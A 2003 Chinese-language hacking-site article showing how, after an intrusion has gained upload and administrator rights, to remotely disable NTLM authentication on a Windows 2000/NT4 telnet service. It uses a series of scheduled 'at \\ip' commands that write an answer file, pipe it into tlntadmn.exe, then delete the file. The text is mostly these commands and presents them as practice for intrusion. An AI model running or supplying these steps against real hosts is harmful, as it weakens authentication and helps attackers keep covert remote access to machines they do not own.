不需要任何工具，遠程屏蔽telnet服務的ntlm認證 
--------------------------------------------------------------------------------
 來源:不明  類別:安全文獻  日期:2003-10-29 23:42:18  今日/總瀏覽: 9/1666   


 
很多人獲得上傳文件的權限和管理員權限以后想啟動遠程的tlelnet服務，但是卻碰到
討厭的NTLM認證，對于這種情況，我們很多時候就采用上傳文件（比如NTLM.exe），然后at遠程定時執行，如果手頭上沒有這樣的工具怎么辦呢？
可以這么做:
大家可以看一下win2000和nt4自帶tlntadmn這個命令，他是用來控制臺修改telnet設置的，很可惜這是一個控制臺的交互式工具，所以at命令沒有辦法直接調用。
現在我們執行一下tlntadmn，然后按照以下的順序操作
停止服務(5)->更改設置(3)->NTLM(7)->確認更改(y)->修改NTLM當前值(0)->再次確認(y)->退出菜單(0)->啟動服務(4)->退出程序(0)
現在大家記住了吧，先后順序是5(回車)3(回車)7(回車)y(回車)0(回車)y(回車)0(回車)4(回車)0(回車)
線在我們這么做
at \\ip time "echo 5 > c:\t.txt"
at \\ip time "echo 3 >> c:\t.txt"
at \\ip time "echo 7 >> c:\t.txt"
at \\ip time "echo y >> c:\t.txt"
at \\ip time "echo 0 >> c:\t.txt"
at \\ip time "echo y >> c:\t.txt"
at \\ip time "echo 0 >> c:\t.txt"
at \\ip time "echo 4 >> c:\t.txt"
at \\ip time "echo 0 >> c:\t.txt"
at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt"
at \\ip time "del c:\t.txt /f"
呵呵按照上面的順序一步一步執行
當然你本地做一個t.txt文件也可以，內容如下:
5
3
7
y
0
y
0
4
0
每個字符后面要加回車，然后copy t.txt \\ip\c$
然后再
at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt"
at \\ip time "del c:\t.txt /f"
很簡單的dos重定向原理，t.txt就相當于手工輸入一系列的操作，完成tlntadmn的交互
呵呵

當然，你們可以在本地試驗好以后再發到遠程主機去
我但是勸大家練習入侵的時候盡量不要使用工具，這樣對自己沒有幫助的

 
小鳳居 版權所有
Copyright ? 2000 - 2003 www.chinesehack.org. All Rights Reserved